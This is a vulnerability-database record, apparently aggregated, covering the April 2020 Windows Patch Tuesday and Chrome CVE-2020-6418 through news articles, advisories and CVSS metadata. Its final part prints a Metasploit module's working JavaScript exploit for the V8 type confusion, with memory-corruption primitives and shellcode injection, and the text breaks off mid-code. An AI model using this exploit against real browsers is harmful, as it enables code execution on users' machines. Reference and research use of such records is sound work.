Explorer flaw ([CVE-2020-0968](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0968>)) has been revised to indicate Microsoft has not yet received reports of it being used in active attacks. 
However, the advisory says this IE bug is likely to be exploited soon.\n\nResearchers at security firm **Recorded Future** zeroed in on [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>), a critical vulnerability dubbed \"SMBGhost\" that was rumored to exist in last month's Patch Tuesday but for which an out-of-band patch wasn't released until March 12. The problem resides in a file-sharing component of Windows, and could be exploited merely by sending the victim machine specially-crafted data packets. Proof-of-concept code showing how to exploit the bug was released April 1, but so far there are no indications this method has been incorporated into malware or active attacks.\n\nRecorded Future's **Allan Liska** notes that one reason these past few months have seen so many patches from Microsoft is the company [recently hired \"SandboxEscaper,\"](<https://twitter.com/SandboxBear/status/1210133985478791171>) a nickname used by the security researcher responsible for [releasing more than a half-dozen zero-day flaws](<https://arstechnica.com/information-technology/2019/05/serial-publisher-of-windows-0days-drops-exploits-for-3-more-unfixed-flaws/>) against Microsoft products last year.\n\n\"SandboxEscaper has made several contributions to this month\u2019s Patch Tuesday,\" Liska said. \"This is great news for Microsoft and the security community at large.\"\n\nOnce again, Adobe has blessed us with a respite from updating its Flash Player program with security fixes. I look forward to the end of this year, when the company has promised to sunset this buggy and insecure program once and for all. Adobe did release security updates for its [ColdFusion, After Effects and Digital Editions software](<https://blogs.adobe.com/psirt/?p=1859>).\n\nSpeaking of buggy software platforms, **Oracle** has released a quarterly patch update to fix more than 400 security flaws across multiple products, including its **Java SE** program. 
If you've got Java installed and you need/want to keep it installed, please [make sure it's up-to-date](<https://java.com/en/download/help/java_update.xml#manual>).\n\nNow for my obligatory disclaimers. Just a friendly reminder that while many of the vulnerabilities fixed in today\u2019s Microsoft patch batch affect Windows 7 operating systems -- including all three of the zero-day flaws -- this OS is no longer being supported with security updates (unless you\u2019re an enterprise taking advantage of Microsoft\u2019s [paid extended security updates program](<https://support.microsoft.com/en-us/help/4527878/faq-about-extended-security-updates-for-windows-7>), which is available to Windows 7 Professional and Windows 7 enterprise users).\n\nIf you rely on Windows 7 for day-to-day use, it\u2019s time to think about upgrading to something newer. That something might be a computer with Windows 10. Or maybe you have always wanted that shiny MacOS computer.\n\nIf cost is a primary motivator and the user you have in mind doesn\u2019t do much with the system other than browsing the Web, perhaps a **Chromebook** or an older machine with a recent version of **Linux** is the answer (Ubuntu may be easiest for non-Linux natives). Whichever system you choose, it\u2019s important to pick one that fits the owner\u2019s needs and provides security updates on an ongoing basis.\n\nKeep in mind that while staying up-to-date on Windows patches is a must, it\u2019s important to make sure you\u2019re updating only after you\u2019ve backed up your important data and files. A reliable backup means you\u2019re not losing your mind when the odd buggy patch causes problems booting the system.\n\nSo do yourself a favor and back up your files before installing any patches. 
Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAs always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips. Also, keep an eye on the [AskWoody blog](<https://www.askwoody.com/2020/february-2020-patch-tuesday-foibles/>) from **Woody Leonhard**, who keeps a close eye on buggy Microsoft updates each month.\n\nFurther reading:\n\n[Qualys breakdown on April 2020 Patch Tuesday](<https://blog.qualys.com/laws-of-vulnerabilities/2020/04/14/april-2020-patch-tuesday-113-vulns-19-critical-0-day-patches-sharepoint-adobe-coldfusion>)\n\n[SANS Internet Storm Center on Patch Tuesday](<https://isc.sans.org/forums/diary/Microsoft+April+2020+Patch+Tuesday/26022/>)", "edition": 2, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-14T22:24:10", "type": "krebs", "title": "Microsoft Patch Tuesday, April 2020 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": 
"AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-1020", "CVE-2020-1027"], "modified": "2020-04-14T22:24:10", "id": "KREBS:1093D39181F7F724932AED0E8DA017A8", "href": "https://krebsonsecurity.com/2020/04/microsoft-patch-tuesday-april-2020-edition/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:38:31", "description": "[](<https://thehackernews.com/images/-YJ1LqrMMEaM/XpX_UksqOuI/AAAAAAAA2qE/3LZJABtjRK0FvjSyceDePk_slKHxeWYmACLcBGAsYHQ/s728-e100/windows-update.jpg>)\n\nIt's **April 2020 Patch Tuesday**, and during these challenging times of the coronavirus pandemic, this month's patch management process would not go easy for many organizations where most of the resources are working remotely. \n \nMicrosoft today [released](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Apr>) the latest batch of software security updates for all supported versions of its Windows operating systems and other products that patch a total of 113 new security vulnerabilities, 17 of which are critical and 96 rated important in severity. \n \n\n\n## Patches for 4 Zero-Days Exploited In the Wild\n\n \nMost importantly, [two of the security flaws](<https://thehackernews.com/2020/03/windows-adobe-font-vulnerability.html>) have been reported as being publicly known at the time of release, and 3 are being actively exploited in the wild by hackers. \n \nOne of the publicly disclosed flaws, which was also exploited as zero-day, resides in the Adobe Font Manager Library used by Windows, the existence of which Microsoft revealed last month within an early security warning for its millions of users. 
\n \nTracked as [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>), the remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format. \n \nAs explained in the [previous post](<https://thehackernews.com/2020/03/windows-adobe-font-vulnerability.html>), the affected font library not only parses content when opened with 3rd-party software but also is used by Windows Explorer to display the content of a file in the 'Preview Pane' or 'Details Pane' without users having to open it. \n \nThe second in-the-wild exploited remote code execution flaw ([CVE-2020-0938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938>)) also resides in the Adobe Type Manager Library that triggers when parsing a malicious OpenType font. \n \nBoth of these zero-day flaws were [reported](<https://twitter.com/itswillis/status/1250116355602419713>) to Microsoft in the last week of March by researchers working with Google Project Zero but with a very short full disclosure deadline, which was then mutually extended considering the current global circumstances. \n \nThe third zero-day is an elevation of privilege vulnerability ([CVE-2020-1027](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1027>)) in the Windows kernel, discovered by the Google Project Zero team, that impacts all supported versions of the Windows operating system\u2014including Windows 10, 8.1 and Server 2008, 2012, 2016, and 2019 editions, as well as Windows 7 for which Microsoft ended its support in January 2020. 
\n \n\n\n## Other New Bugs Microsoft Patched this Month\n\n \nThe second publicly known issue, which was not exploited in the wild, is an important elevation of privilege vulnerability ([CVE-2020-0935](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0935>)) that resides in the OneDrive for Windows desktop. \n \nThe latest update also includes patches for 5 critical flaws that affect Microsoft Office SharePoint, 4 of which exist due to the failure of the software to check the source markup of an application package, allowing remote attackers to execute arbitrary code on the affected machines. \n \nMeanwhile, the 5th SharePoint flaw is a cross-site-scripting (XSS) issue (**CVE-2020-0927**) that can be exploited by an authenticated attacker by sending a specially crafted request to an affected SharePoint server. \n \nThere's another notable flaw, tracked as **CVE-2020-0910** and rated critical, that affects Windows Hyper-V, allowing a guest virtual machine to compromise the hypervisor, escaping from a guest virtual machine to the host, or escaping from one guest virtual machine to another guest virtual machine. \n \nBesides these, other critical flaws Microsoft patched this month affect Chakra scripting engine, Microsoft Dynamics 365 Business Central, media foundation, graphics components, codecs library and VBScript\u2014all leading to remote code execution attacks. \n \nWindows users and system administrators are highly advised to apply the latest security patches as soon as possible in an attempt to keep cybercriminals and hackers away from taking control of their computers. \n \nFor installing the latest Windows security updates, you can head on to Settings \u2192 Update & Security \u2192 Windows Update \u2192 Check for updates on your PC, or you can install the updates manually. \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T18:24:00", "type": "thn", "title": "Microsoft Issues Patches for 3 Bugs Exploited as Zero-Day in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 5.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.7, "vectorString": "AV:A/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0910", "CVE-2020-0927", "CVE-2020-0935", "CVE-2020-0938", "CVE-2020-1020", "CVE-2020-1027"], "modified": "2020-04-15T11:05:48", "id": "THN:D8AAE3E21499FA77C4C1B73C1DDA01E1", "href": "https://thehackernews.com/2020/04/windows-patch-update.html", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:36", "description": "[](<https://thehackernews.com/images/-TpSAclc1CUY/XlUH-042UlI/AAAAAAAA2a8/rZXeX3W340I8FcHae_U9qtF8muP0p7aUQCLcBGAsYHQ/s728-e100/chrome-browser-software-update.jpg>)\n\nGoogle yesterday released a new critical software update for its Chrome web browser for desktops that will be rolled 
out to Windows, Mac, and Linux users over the next few days. \n \nThe latest Chrome 80.0.3987.122 includes security fixes for [three new vulnerabilities](<https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html>), all of which have been marked 'HIGH' in severity, including one (CVE-2020-6418) that has been reportedly exploited in the wild. \n \nThe brief description of the Chrome bugs, which pose a significant risk to your systems if left unpatched, is as follows: \n \n\n\n * **Integer overflow in ICU** \u2014 Reported by Andr\u00e9 Bargull on 2020-01-22\n * **Out of bounds memory access in streams (CVE-2020-6407)** \u2014 Reported by Sergei Glazunov of Google Project Zero on 2020-01-27\n * **Type confusion in V8 (CVE-2020-6418)** \u2014 Reported by Clement Lecigne of Google's Threat Analysis Group on 2020-02-18\n \n \nThe Integer Overflow vulnerability was disclosed by Andr\u00e9 Bargull privately to Google last month, earning him $5,000 in rewards, while the other two vulnerabilities \u2014 CVE-2020-6407 and CVE-2020-6418 \u2014 were identified by experts from the Google security team. \n \nGoogle has said CVE-2020-6418, which stems from a type confusion error in its V8 JavaScript rendering engine, is being actively exploited, although technical information about the vulnerability is restricted at this time. \n \nThe search giant has not disclosed further details of the vulnerabilities so that it gives affected users enough time to install the Chrome update and prevent hackers from exploiting them. \n \nA successful exploitation of the integer overflow or out-of-bounds write flaws could allow a remote attacker to compromise a vulnerable system by tricking the user into visiting a specially crafted web page that takes advantage of the exploit to execute arbitrary code on the target system. 
\n \nIt's recommended that Windows, Linux, and macOS users [download and install the latest version](<https://support.google.com/chrome/answer/95414?co=GENIE.Platform%3DDesktop&hl=en>) of Chrome by heading to Help > \"About Chrome\" from the settings menu.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-25T11:47:00", "type": "thn", "title": "Install Latest Chrome Update to Patch 0-Day Bug Under Active Attacks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-02-25T11:47:01", "id": "THN:DC209DD441842FCD2682680F22D67854", "href": "https://thehackernews.com/2020/02/google-chrome-zero-day.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-03-31T23:35:46", "description": "A type confusion vulnerability exists in Google Chrome. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-27T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome Type Confusion (CVE-2020-6418)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2021-01-25T00:00:00", "id": "CPAI-2020-0097", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-09T15:18:12", "description": "A remote code execution vulnerability exists in Microsoft Windows. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft OpenType Font Parsing Remote Code Execution (CVE-2020-0938)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938"], "modified": "2022-11-09T00:00:00", "id": "CPAI-2020-0195", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:40:54", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Kernel Elevation of Privilege (CVE-2020-1027)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1027"], "modified": "2020-04-14T00:00:00", "id": "CPAI-2020-0258", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:37:24", "description": "A remote code execution vulnerability exists in Microsoft Windows. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Font Manager Library Remote Code Execution Vulnerability (CVE-2020-1020)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1020"], "modified": "2020-10-25T00:00:00", "id": "CPAI-2020-0197", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2023-01-28T06:04:17", "description": "Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-27T23:15:00", "type": "debiancve", "title": "CVE-2020-6418", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2020-02-27T23:15:00", "id": "DEBIANCVE:CVE-2020-6418", "href": "https://security-tracker.debian.org/tracker/CVE-2020-6418", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-11-03T04:47:40", "description": "This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit corrupts the length of a float array (float_rel), which can then be used for out of bounds read and write on adjacent memory. The relative read and write is then used to modify a UInt64Array (uint64_aarw) which is used for read and writing from absolute memory. The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode. 
The payload is executed within the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work correctly.\n", "cvss3": {}, "published": "2020-02-29T10:41:04", "type": "metasploit", "title": "Google Chrome 80 JSCreate side-effect type confusion exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-6418"], "modified": "2022-02-16T11:48:55", "id": "MSF:EXPLOIT-MULTI-BROWSER-CHROME_JSCREATE_SIDEEFFECT-", "href": "https://www.rapid7.com/db/modules/exploit/multi/browser/chrome_jscreate_sideeffect/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::Remote::HttpServer::BrowserExploit\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Google Chrome 80 JSCreate side-effect type confusion exploit',\n 'Description' => %q{\n This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). 
The exploit\n corrupts the length of a float array (float_rel), which can then be used for out\n of bounds read and write on adjacent memory.\n The relative read and write is then used to modify a UInt64Array (uint64_aarw)\n which is used for read and writing from absolute memory.\n The exploit then uses WebAssembly in order to allocate a region of RWX memory,\n which is then replaced with the payload shellcode.\n The payload is executed within the sandboxed renderer process, so the browser\n must be run with the --no-sandbox option for the payload to work correctly.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Cl\u00e9ment Lecigne', # discovery\n 'Istv\u00e1n Kurucsai', # exploit\n 'Vignesh S Rao', # exploit\n 'timwr', # metasploit copypasta\n ],\n 'References' => [\n ['CVE', '2020-6418'],\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1053604'],\n ['URL', 'https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping'],\n ['URL', 'https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90'],\n ],\n 'Arch' => [ ARCH_X64 ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'SideEffects' => [ IOC_IN_LOGS ],\n 'Stability' => [CRASH_SAFE]\n },\n 'Targets' =>\n [\n ['Windows 10 - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'win'}],\n ['macOS - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'osx'}],\n ],\n 'DisclosureDate' => '2020-02-19'))\n end\n\n def on_request_uri(cli, request)\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\n escaped_payload = Rex::Text.to_unescape(payload.raw)\n jscript = %Q^\nvar shellcode = unescape(\"#{escaped_payload}\");\n\n// HELPER FUNCTIONS\nlet conversion_buffer = new ArrayBuffer(8);\nlet float_view = new Float64Array(conversion_buffer);\nlet int_view = new BigUint64Array(conversion_buffer);\nBigInt.prototype.hex = function() {\n return '0x' + this.toString(16);\n};\nBigInt.prototype.i2f = function() 
{\n int_view[0] = this;\n return float_view[0];\n}\nBigInt.prototype.smi2f = function() {\n int_view[0] = this << 32n;\n return float_view[0];\n}\nNumber.prototype.f2i = function() {\n float_view[0] = this;\n return int_view[0];\n}\nNumber.prototype.f2smi = function() {\n float_view[0] = this;\n return int_view[0] >> 32n;\n}\n\nNumber.prototype.fhw = function() {\n float_view[0] = this;\n return int_view[0] >> 32n;\n}\n\nNumber.prototype.flw = function() {\n float_view[0] = this;\n return int_view[0] & BigInt(2**32-1);\n}\n\nNumber.prototype.i2f = function() {\n return BigInt(this).i2f();\n}\nNumber.prototype.smi2f = function() {\n return BigInt(this).smi2f();\n}\n\nfunction hex(a) {\n return a.toString(16);\n}\n\n//\n// EXPLOIT\n//\n\n// the number of holes here determines the OOB write offset\nlet vuln = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1];\nvar float_rel; // float array, initially corruption target\nvar float_carw; // float array, used for reads/writes within the compressed heap\nvar uint64_aarw; // uint64 typed array, used for absolute reads/writes in the entire address space\nvar obj_leaker; // used to implement addrof\nvuln.pop();\nvuln.pop();\nvuln.pop();\n\nfunction empty() {}\n\nfunction f(nt) {\n // The compare operation enforces an effect edge between JSCreate and Array.push, thus introducing the bug\n vuln.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 
0.2 : 156842065920.05);\n for (var i = 0; i < 0x10000; ++i) {};\n}\n\nlet p = new Proxy(Object, {\n get: function() {\n vuln[0] = {};\n float_rel = [0.2, 1.2, 2.2, 3.2, 4.3];\n float_carw = [6.6];\n uint64_aarw = new BigUint64Array(4);\n obj_leaker = {\n a: float_rel,\n b: float_rel,\n };\n\n return Object.prototype;\n }\n});\n\nfunction main(o) {\n for (var i = 0; i < 0x10000; ++i) {};\n return f(o);\n}\n\n// reads 4 bytes from the compressed heap at the specified dword offset after float_rel\nfunction crel_read4(offset) {\n var qw_offset = Math.floor(offset / 2);\n if (offset & 1 == 1) {\n return float_rel[qw_offset].fhw();\n } else {\n return float_rel[qw_offset].flw();\n }\n}\n\n// writes the specified 4-byte BigInt value to the compressed heap at the specified offset after float_rel\nfunction crel_write4(offset, val) {\n var qw_offset = Math.floor(offset / 2);\n // we are writing an 8-byte double under the hood\n // read out the other half and keep its value\n if (offset & 1 == 1) {\n temp = float_rel[qw_offset].flw();\n new_val = (val << 32n | temp).i2f();\n float_rel[qw_offset] = new_val;\n } else {\n temp = float_rel[qw_offset].fhw();\n new_val = (temp << 32n | val).i2f();\n float_rel[qw_offset] = new_val;\n }\n}\n\nconst float_carw_elements_offset = 0x14;\n\nfunction cabs_read4(caddr) {\n elements_addr = caddr - 8n | 1n;\n crel_write4(float_carw_elements_offset, elements_addr);\n print('cabs_read4: ' + hex(float_carw[0].f2i()));\n res = float_carw[0].flw();\n // TODO restore elements ptr\n return res;\n}\n\n\n// This function provides arbitrary within read the compressed heap\nfunction cabs_read8(caddr) {\n elements_addr = caddr - 8n | 1n;\n crel_write4(float_carw_elements_offset, elements_addr);\n print('cabs_read8: ' + hex(float_carw[0].f2i()));\n res = float_carw[0].f2i();\n // TODO restore elements ptr\n return res;\n}\n\n// This function provides arbitrary write within the compressed heap\nfunction cabs_write4(caddr, val) {\n elements_addr = caddr - 
8n | 1n;\n\n temp = cabs_read4(caddr + 4n | 1n);\n print('cabs_write4 temp: '+ hex(temp));\n\n new_val = (temp << 32n | val).i2f();\n\n crel_write4(float_carw_elements_offset, elements_addr);\n print('cabs_write4 prev_val: '+ hex(float_carw[0].f2i()));\n\n float_carw[0] = new_val;\n // TODO restore elements ptr\n return res;\n}\n\nconst objleaker_offset = 0x41;\nfunction addrof(o) {\n obj_leaker.b = o;\n addr = crel_read4(objleaker_offset) & BigInt(2**32-2);\n obj_leaker.b = {};\n return addr;\n}\n\nconst uint64_externalptr_offset = 0x1b; // in 8-bytes\n\n// Arbitrary read. We corrupt the backing store of the `uint64_aarw` array and then read from the array\nfunction read8(addr) {\n faddr = addr.i2f();\n t1 = float_rel[uint64_externalptr_offset];\n t2 = float_rel[uint64_externalptr_offset + 1];\n float_rel[uint64_externalptr_offset] = faddr;\n float_rel[uint64_externalptr_offset + 1] = 0.0;\n\n val = uint64_aarw[0];\n\n float_rel[uint64_externalptr_offset] = t1;\n float_rel[uint64_externalptr_offset + 1] = t2;\n return val;\n}\n\n// Arbitrary write. 
